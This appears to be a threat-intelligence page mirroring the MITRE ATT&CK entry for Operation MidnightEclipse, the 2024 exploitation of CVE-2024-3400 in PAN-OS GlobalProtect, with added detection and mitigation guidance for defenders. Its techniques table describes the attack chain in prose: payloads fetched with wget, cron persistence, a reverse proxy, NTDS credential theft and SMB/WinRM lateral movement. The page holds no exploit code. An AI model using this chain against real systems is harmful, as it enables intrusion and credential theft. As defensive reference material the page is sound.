C0048: Operation MidnightEclipse
Operation MidnightEclipse was a campaign conducted in March and April 2024 that involved initial exploit of zero-day vulnerability CVE-2024-3400, a critical command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS.[1][2]
Analyst context for executives and security teams
Operation MidnightEclipse matters because it shows how a critical zero-day in an internet-facing security appliance can become the entry point for broader enterprise activity. For leaders, the key issue is not only whether CVE-2024-3400 was patched, but whether the organization can prove exposure, compromise assessment, credential review, lateral movement checks, and post-exploitation monitoring were completed.
Executive priority
Prioritize this as an edge-device and incident-readiness case. The campaign is tied to exploitation of CVE-2024-3400 in Palo Alto Networks PAN-OS GlobalProtect and to follow-on behaviors involving a backdoor, command execution, tool transfer, credential access, data collection, staging, command-and-control, and lateral movement techniques. Executives should ask for evidence of affected-asset inventory, patch/remediation status, firewall log retention, identity impact review, domain controller monitoring, and incident response decisions made after exposure was identified.
Technical view
ATT&CK does not provide campaign-specific detection guidance, so defenders should validate coverage against the related behaviors. Confirm whether exposed GlobalProtect/PAN-OS assets were inventoried and reviewed for signs associated with CVE-2024-3400 and UPSTYLE. For SOC and IR teams, the practical pivot is from edge compromise to enterprise impact: Unix shell execution, cron persistence, web-protocol C2, proxy use, ingress tool transfer, local data collection/staging, valid account abuse, SMB/WinRM lateral movement, and NTDS access attempts. Because the campaign object itself has no specified platforms or tactics, platform assumptions should be driven by the related software and techniques plus local asset evidence.
Likely telemetry
- Internet-facing firewall and GlobalProtect/PAN-OS logs, including management, system, authentication, and traffic records where available
- Network device file integrity, process, shell, and scheduled task/cron evidence where collected
- HTTP/HTTPS egress logs, proxy logs, DNS records, and firewall traffic metadata for unusual command-and-control patterns
- File creation, modification, and transfer evidence on affected network devices and adjacent Linux systems
- Identity provider, VPN, and privileged account authentication logs for valid-account misuse
Detection direction
- Start with exposure validation: identify PAN-OS GlobalProtect assets potentially affected by CVE-2024-3400 during the March-April 2024 campaign window described by ATT&CK and the cited reports.
- Tune detections for the relationship-driven chain rather than a single indicator: edge exploitation, UPSTYLE-related backdoor activity, Unix shell execution, cron changes, ingress tool transfer, proxy or web-protocol C2, and local staging.
- Correlate edge-device events with identity activity. Valid accounts and domain accounts are related techniques, so unexpected VPN, privileged, service, or domain account use after edge-device anomalies should be investigated.
- Validate Windows lateral movement coverage for SMB admin shares and WinRM, especially where authentication appears legitimate but source systems, timing, or account context are abnormal.
- Review domain controller monitoring for NTDS access attempts and access to backups containing domain credential material.
Mitigation priorities
- Confirm asset inventory and remediation status for Palo Alto Networks PAN-OS GlobalProtect systems relevant to CVE-2024-3400.
- Preserve and review logs from affected or potentially affected edge devices before retention windows expire.
- Treat confirmed or suspected edge compromise as an identity-risk event: review privileged, VPN, service, and domain account activity and rotate credentials where incident findings justify it.
- Restrict and monitor administrative paths from edge devices into internal networks, including access that could enable SMB, WinRM, or domain controller interaction.
- Harden monitoring for Unix shell execution, cron persistence, file transfer, and outbound web/proxy traffic on network devices and supporting Linux systems where telemetry is available.
Analyst notes and limits
The decision value of this object is the campaign chain: public-facing appliance exploitation leading to possible backdoor, execution, persistence, C2, collection, credential, and lateral movement concerns. For managed detection and IR, the most important validation is whether telemetry exists at the edge and whether investigations connected appliance events to identity and Windows domain activity.
ATT&CK provides no official detection text for this campaign, and the campaign object itself lists no platforms or tactics. Platform and behavior guidance here is derived from the official description, external references, and supplied relationships only. Local exposure, compromise, and control effectiveness require environment-specific evidence.
Operation MidnightEclipse
Operation MidnightEclipse was a campaign conducted in March and April 2024 that involved initial exploit of zero-day vulnerability CVE-2024-3400, a critical command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS.[1][2]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1005 | Data from Local System | During Operation MidnightEclipse, threat actors stole saved cookies and login data from targeted systems.CitationVolexity UPSTYLE 2024 |
| Enterprise | T1078.002 | Domain Accounts Sub-technique | During Operation MidnightEclipse, threat actors used a compromised domain admin account to move laterally.CitationVolexity UPSTYLE 2024 |
| Enterprise | T1003.003 | NTDS Sub-technique | During Operation MidnightEclipse, threat actors obtained active directory credentials via the NTDS.DIT file.CitationVolexity UPSTYLE 2024 |
| Enterprise | T1059.004 | Unix Shell Sub-technique | During Operation MidnightEclipse, threat actors piped output from stdout to bash for execution.CitationVolexity UPSTYLE 2024CitationPalo Alto MidnightEclipse APR 2024 |
| Enterprise | T1090 | Proxy | During Operation MidnightEclipse, threat actors used the GO Simple Tunnel reverse proxy tool.CitationVolexity UPSTYLE 2024 |
| Enterprise | T1559 | Inter-Process Communication | During Operation MidnightEclipse, threat actors wrote output to stdout then piped it to bash for execution.CitationVolexity UPSTYLE 2024 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | During Operation MidnightEclipse, threat actors used `wget` via HTTP to retrieve payloads.CitationVolexity UPSTYLE 2024CitationPalo Alto MidnightEclipse APR 2024 |
| Enterprise | T1078 | Valid Accounts | During Operation MidnightEclipse, threat actors extracted sensitive credentials while moving laterally through compromised networks.CitationVolexity UPSTYLE 2024 |
| Enterprise | T1190 | Exploit Public-Facing Application | During Operation MidnightEclipse, threat actors exploited CVE-2024-3400 in Palo Alto Networks GlobalProtect.CitationVolexity UPSTYLE 2024CitationPalo Alto MidnightEclipse APR 2024 |
| Enterprise | T1584.003 | Virtual Private Server Sub-technique | During Operation MidnightEclipse, threat actors abused Virtual Private Servers to store malicious files.CitationVolexity UPSTYLE 2024 |
| Enterprise | T1105 | Ingress Tool Transfer | During Operation MidnightEclipse, threat actors downloaded additional payloads on compromised devices.CitationVolexity UPSTYLE 2024CitationPalo Alto MidnightEclipse APR 2024 |
| Enterprise | T1588.002 | Tool Sub-technique | During Operation MidnightEclipse, threat actors used the GO Simple Tunnel (GOST) reverse proxy tool.CitationVolexity UPSTYLE 2024 |
| Enterprise | T1053.003 | Cron Sub-technique | During Operation MidnightEclipse, threat actors configured cron jobs to retrieve payloads from actor-controlled infrastructure.CitationVolexity UPSTYLE 2024CitationPalo Alto MidnightEclipse APR 2024 |
| Enterprise | T1021.002 | SMB/Windows Admin Shares Sub-technique | During Operation MidnightEclipse, threat actors used SMB to pivot internally in victim networks.CitationVolexity UPSTYLE 2024 |
| Enterprise | T1074.001 | Local Data Staging Sub-technique | During Operation MidnightEclipse, threat actors copied files to the web application folder on compromised devices for exfiltration.CitationPalo Alto MidnightEclipse APR 2024 |
| Enterprise | T1021.006 | Windows Remote Management Sub-technique | During Operation MidnightEclipse, threat actors used WinRM to move laterally in targeted networks.CitationVolexity UPSTYLE 2024 |
| Enterprise | T1584.006 | Web Services Sub-technique | During Operation MidnightEclipse, threat actors abused compromised AWS buckets to store files.CitationVolexity UPSTYLE 2024 |
Groups, software, and campaigns
S1164: UPSTYLE
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | cd9ffb98cd3b… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Volexity UPSTYLE 2024
Volexity Threat Research. (2024, April 12). Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400). Retrieved November 20, 2024.
Open source URL -
[2]
Palo Alto MidnightEclipse APR 2024
Unit 42. (2024, April 12). Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 . Retrieved January 15, 2025.
Open source URL -
[3]
mitre-attack C0048Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.